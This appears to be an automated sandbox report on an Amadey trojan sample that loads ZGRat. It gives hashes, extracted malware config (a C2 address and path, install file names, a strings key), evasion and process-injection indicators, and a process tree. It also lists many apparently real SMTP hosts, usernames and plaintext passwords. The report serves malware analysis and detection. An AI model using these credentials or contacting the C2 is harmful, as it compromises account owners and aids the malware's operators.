amadey | dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

General

Target

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Size

1.8MB
MD5

8c2ad888796dd437e88eaec086475531
SHA1

f93a9948c83c4ddfe87279dd7fa167dee5baae07
SHA256

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4
SHA512

ba5371bea752a6659b3af866b28f757b3f744d6bd597085428dd7a41f3b649edf49eaeb0375174d81a78613f4293be1cd6c68924f196c3464c20b634f1ec9346
SSDEEP

24576:o8aAMAAc+3ElJVan2m+b54MfunwjhkN50g40yBdhEeuwwjzzHS2JtRTiYI:l1za7YOw6Njy/OSwTHScR

Score

10^/10

amadey zgrat evasion rat trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mx.sergw.com
Port:
587
Username:
[email protected]
Password:
wer111111

Extracted

Credentials

Protocol: smtp
Host:
mx.giochi0.it
Port:
587
Username:
[email protected]
Password:
cazzo1235

Extracted

Credentials

Protocol: smtp
Host:
securesmtp.genexine.com
Port:
587
Username:
[email protected]
Password:
CsB0000

Extracted

Credentials

Protocol: smtp
Host:
mx.giochi0.it
Port:
587
Username:
[email protected]
Password:
sara3357324135

Extracted

Credentials

Protocol: smtp
Host:
mx.breakthur.com
Port:
587
Username:
[email protected]
Password:
H0t3l741

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
abbs224you

Extracted

Credentials

Protocol: smtp
Host:
mx.gfgfgf.org
Port:
587
Username:
[email protected]
Password:
Lvhtc12345!

Extracted

Credentials

Protocol: smtp
Host:
wightman.ca
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
mail.pwatkins.co.uk
Port:
587
Username:
[email protected]
Password:
luvvy001123424

Extracted

Credentials

Protocol: smtp
Host:
mx.gfgfgf.org
Port:
587
Username:
[email protected]
Password:
!FW4PozpJ!

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
emily1

Extracted

Credentials

Protocol: smtp
Host:
mx.gcdetectivefree.com
Port:
587
Username:
[email protected]
Password:
phsffi

Extracted

Credentials

Protocol: smtp
Host:
mx.gcdetectivefree.com
Port:
587
Username:
[email protected]
Password:
vsHOeaB2681

Extracted

Credentials

Protocol: smtp
Host:
mx.progiftstore.org
Port:
587
Username:
[email protected]
Password:
3ehd1ixi1y

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3268-43-0x0000000007020000-0x0000000007260000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-51-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-49-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-47-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-67-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-79-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-87-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-93-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-91-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-103-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-107-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-105-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-101-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-99-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-97-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-96-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-89-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-85-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-83-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-81-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-77-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-75-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-73-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-71-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-69-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-65-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-63-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-61-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-59-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-58-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-55-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-53-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-46-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4908 created 632 4908 powershell.EXE winlogon.exe
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

description	pid	process	target process
PID 4908 created 632	4908	powershell.EXE	winlogon.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplons.exedd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Drops startup file 1 IoCs

Processes:

Kaxhwswfup.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs Kaxhwswfup.exe
Executes dropped EXE 6 IoCs

Processes:

axplons.exeKaxhwswfup.exeaxplons.exe$773372c6$77419698axplons.exe

pid process

1352 axplons.exe
3268 Kaxhwswfup.exe
1784 axplons.exe
884 $773372c6
4988 $77419698
2020 axplons.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

pid	process
1352	axplons.exe
3268	Kaxhwswfup.exe
1784	axplons.exe
884	$773372c6
4988	$77419698
2020	axplons.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	axplons.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exeaxplons.exe

pid process

2364 dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
1352 axplons.exe
1784 axplons.exe
2020 axplons.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Kaxhwswfup.exepowershell.EXE

description	pid	process	target process
PID 3268 set thread context of 884	3268	Kaxhwswfup.exe	$773372c6
PID 4908 set thread context of 2616	4908	powershell.EXE	dllhost.exe
PID 3268 set thread context of 4988	3268	Kaxhwswfup.exe	$77419698

Drops file in Windows directory 1 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe

description ioc process

File created C:\Windows\Tasks\axplons.job dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\axplons.job	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe

Modifies data under HKEY_USERS 55 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:34:01 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={429B9DBB-3190-43E3-8E20-2F0160FF5EEB}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715729640"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exepowershell.EXEdllhost.exeKaxhwswfup.exe

pid	process
2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
1352	axplons.exe
1352	axplons.exe
1784	axplons.exe
1784	axplons.exe
4908	powershell.EXE
4908	powershell.EXE
4908	powershell.EXE
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
3268	Kaxhwswfup.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

Kaxhwswfup.exepowershell.EXEdllhost.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	3268	Kaxhwswfup.exe
Token: SeDebugPrivilege	4908	powershell.EXE
Token: SeDebugPrivilege	4908	powershell.EXE
Token: SeDebugPrivilege	2616	dllhost.exe
Token: SeDebugPrivilege	3268	Kaxhwswfup.exe
Token: SeShutdownPrivilege	440	dwm.exe
Token: SeCreatePagefilePrivilege	440	dwm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe

pid process

2364 dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeKaxhwswfup.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2364 wrote to memory of 1352	2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	axplons.exe
PID 2364 wrote to memory of 1352	2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	axplons.exe
PID 2364 wrote to memory of 1352	2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	axplons.exe
PID 1352 wrote to memory of 3268	1352	axplons.exe	Kaxhwswfup.exe
PID 1352 wrote to memory of 3268	1352	axplons.exe	Kaxhwswfup.exe
PID 1352 wrote to memory of 3268	1352	axplons.exe	Kaxhwswfup.exe
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	$773372c6
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 4908 wrote to memory of 2616	4908	powershell.EXE	dllhost.exe
PID 2616 wrote to memory of 632	2616	dllhost.exe	winlogon.exe
PID 2616 wrote to memory of 692	2616	dllhost.exe	lsass.exe
PID 2616 wrote to memory of 976	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 440	2616	dllhost.exe	dwm.exe
PID 2616 wrote to memory of 456	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 860	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1052	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1060	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1132	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1212	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1224	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1308	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1396	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1448	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1600	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1612	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1644	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1652	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1740	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1788	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1844	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1932	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1980	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 1988	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2056	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2064	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2180	2616	dllhost.exe	spoolsv.exe
PID 2616 wrote to memory of 2252	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2392	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2568	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2576	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2620	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2632	2616	dllhost.exe	sihost.exe
PID 2616 wrote to memory of 2648	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2720	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2732	2616	dllhost.exe	sysmon.exe
PID 2616 wrote to memory of 2756	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2780	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 2792	2616	dllhost.exe	svchost.exe
PID 2616 wrote to memory of 3104	2616	dllhost.exe	unsecapp.exe
PID 2616 wrote to memory of 3340	2616	dllhost.exe	Explorer.EXE

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:440

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{20938066-54d9-4b91-a636-8f0d840ae58b}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:860

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
